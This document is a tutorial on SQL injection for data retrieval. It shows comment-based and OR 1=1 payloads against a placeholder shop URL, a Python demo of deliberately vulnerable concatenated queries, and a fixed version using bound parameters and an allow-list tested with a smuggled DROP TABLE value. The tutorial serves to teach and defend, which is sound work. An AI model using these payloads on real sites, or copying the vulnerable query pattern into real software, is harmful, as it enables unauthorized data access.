
SQL Injection Data Retrieval

SQL injection attacks tamper with the SQL queries an application sends to its database so that they return data the attacker is not authorized to see. In the simplest case the attacker modifies user-supplied input that the application splices directly into a query, changing the query's logic so that hidden or sensitive rows are returned alongside, or instead of, the rows the application meant to show.

Example Scenario

Normal Application Flow

Consider an e-commerce application displaying products by category:

https://insecure-website.com/products?category=Gifts

The application executes this SQL query:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

Query Structure Breakdown

  • Target: All columns (*) from the products table.
  • Filters:
    • category = 'Gifts': Only products in the 'Gifts' category.
    • released = 1: Only products that have been released; unreleased (hidden) products have released = 0.

Attack Techniques

1. Comment-Based Injection

Payload:
https://insecure-website.com/products?category=Gifts'--
Resulting Query:
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1
How it works:
  • The single quote closes the string literal early, and the -- that follows starts an SQL comment, so everything after it (the now-dangling closing quote and the AND released = 1 filter) is ignored by the database.
  • Because the filter is gone, the query returns every product in the Gifts category, released or not.
  • On MySQL the -- marker must be followed by a space to count as a comment, so in a URL it is usually sent as --+ (the + decodes to a space); # can be used instead on MySQL.

2. OR-Based Injection

Payload:
https://insecure-website.com/products?category=Gifts' OR 1=1--
Resulting Query:
SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1
How it works:
  • Adds OR 1=1 to the WHERE clause; since 1=1 is true for every row, the condition matches the whole table.
  • Returns all products in every category, including unreleased ones.
  • The comment removes the released = 1 filter and the dangling closing quote that would otherwise make the query invalid.
  • OR 1=1 is only safe to inject into a query that does nothing but read: if the same input also reaches an UPDATE or DELETE statement, a condition that matches every row would modify or delete the entire table.
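Both payloads run against a small SQLite database below, as an added example that is not code from the original page. The site's real schema is unknown, so the products table and its rows are constructed sample data, and an in-memory SQLite database stands in for whatever database the site uses; the query builder reproduces the bug the page describes, splicing the category value straight into the SQL text.

```python
import sqlite3

# Constructed sample catalogue standing in for the site's products table:
# two released products and two hidden (released = 0) ones.
PRODUCTS = [
    ("Gift Basket", "Gifts", 1),
    ("Scented Candle", "Gifts", 0),     # hidden
    ("Lamp", "Lifestyle", 1),
    ("Prototype Gadget", "Tech", 0),    # hidden
]


def build_db():
    """Create an in-memory SQLite database holding the sample products."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn


def vulnerable_sql(category):
    """Build the query the way the insecure site does: by string concatenation."""
    return f"SELECT name FROM products WHERE category = '{category}' AND released = 1"


def fetch_names(conn, category):
    """Run the vulnerable query for a raw ?category= value and return the names."""
    return [row[0] for row in conn.execute(vulnerable_sql(category))]


if __name__ == "__main__":
    conn = build_db()
    # Decoded values of ?category= for the benign request and the two payloads.
    for value in ("Gifts", "Gifts'--", "Gifts' OR 1=1--"):
        print(f"{value!r:20} -> {vulnerable_sql(value)}")
        print(f"{'':20}    {fetch_names(conn, value)}")
```

The benign value returns only Gift Basket; the comment payload adds the hidden Scented Candle; the OR payload returns all four rows. SQLite accepts -- with no trailing space, so the payloads work here exactly as written; against MySQL the comment marker would need the trailing space noted above.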

Vulnerability Analysis

  1. The application builds its SQL query by concatenating user input into the query string instead of binding it as a parameter.
  2. The category parameter is taken straight from the URL, so it is entirely attacker-controlled.
  3. The released = 1 filter is the only control hiding unreleased products; once the attacker controls the query text, that filter can simply be commented out.

Security Impact

  • Attacker can modify the query structure.
  • Potential unauthorized access to unreleased products.
  • Risk of exposing sensitive business data.

Best Practices to Prevent SQL Injection

  1. Use parameterized queries (prepared statements) so user input is bound as data and never becomes part of the SQL text.
  2. Validate user input against its expected type and format before it reaches the database, as defence in depth rather than a substitute for parameterization.
  3. Apply proper access controls: run the application under a database account with the minimum privileges it needs, so a successful injection exposes as little as possible.
  4. Allow-list anything that cannot be bound as a parameter, such as table or column names and sort orders, instead of building it from raw input.
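The same scenario with the first and fourth practices applied, as an added example that is not from the original page: the category value is bound with a ? placeholder, and a sort column, which cannot be bound as a parameter, is checked against an allow-list before it is placed in the query text. The products table is constructed sample data, the sort_by parameter is an assumed addition to the page's scenario, and an in-memory SQLite database stands in for the site's real database.

```python
import sqlite3

# Constructed sample data: two released products and two hidden ones.
PRODUCTS = [
    ("Gift Basket", "Gifts", 1),
    ("Scented Candle", "Gifts", 0),
    ("Lamp", "Lifestyle", 1),
    ("Prototype Gadget", "Tech", 0),
]

# Identifiers cannot be bound as parameters, so anything that has to appear in
# the SQL text itself (here the ORDER BY column) comes from a fixed allow-list.
SORTABLE_COLUMNS = frozenset({"name", "category"})


def build_db():
    """Create an in-memory SQLite database holding the sample products."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT, released INTEGER)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?)", PRODUCTS)
    return conn


def fetch_released(conn, category, sort_by="name"):
    """Return released products in a category, with the category bound as data.

    sort_by is an assumed extra request parameter; it is rejected unless it is
    one of the allow-listed column names, because it is interpolated into SQL.
    """
    if sort_by not in SORTABLE_COLUMNS:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    sql = (
        "SELECT name FROM products WHERE category = ? AND released = 1 "
        f"ORDER BY {sort_by}"
    )
    # The driver sends `category` to the database separately from the SQL text,
    # so a quote or comment marker inside it is just part of the value compared.
    return [row[0] for row in conn.execute(sql, (category,))]


if __name__ == "__main__":
    conn = build_db()
    for value in ("Gifts", "Gifts'--", "Gifts' OR 1=1--"):
        print(f"{value!r:20} -> {fetch_released(conn, value)}")
    try:
        fetch_released(conn, "Gifts", sort_by="name; DROP TABLE products")
    except ValueError as exc:
        print("rejected:", exc)
```

With the input bound as a parameter, both payloads are looked up as literal category names that do not exist and return no rows, while the benign request still returns Gift Basket; the released = 1 filter can no longer be commented out because the input never becomes SQL.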